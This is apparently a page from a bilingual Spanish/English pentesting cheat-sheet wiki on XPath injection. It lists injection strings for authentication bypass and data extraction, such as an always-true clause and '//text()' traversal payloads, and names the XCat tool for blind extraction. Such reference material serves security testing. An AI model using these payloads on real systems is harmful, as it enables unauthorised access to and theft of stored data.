Home

XPath injection

XML Path Language (XPath) injection

Identificación

Authentication bypass

Data exfiltration

invalid') or ('1'='1
 | //text()
..//text()
../..//text()
../../..//text()
../../../..//text()
../../../../..//text()
1234 or contains(.,'<text-to-search>')

Schema depth

Blind

Herramientas

XCat

Especificar al parámetro vulnerable (<vulnerable-param>) un valor de muestra que conduzca a un resultado positivo (<true-condition>).

AnteriorCRLF injectionSiguienteLDAP injection

Última actualización

¿Te fue útil?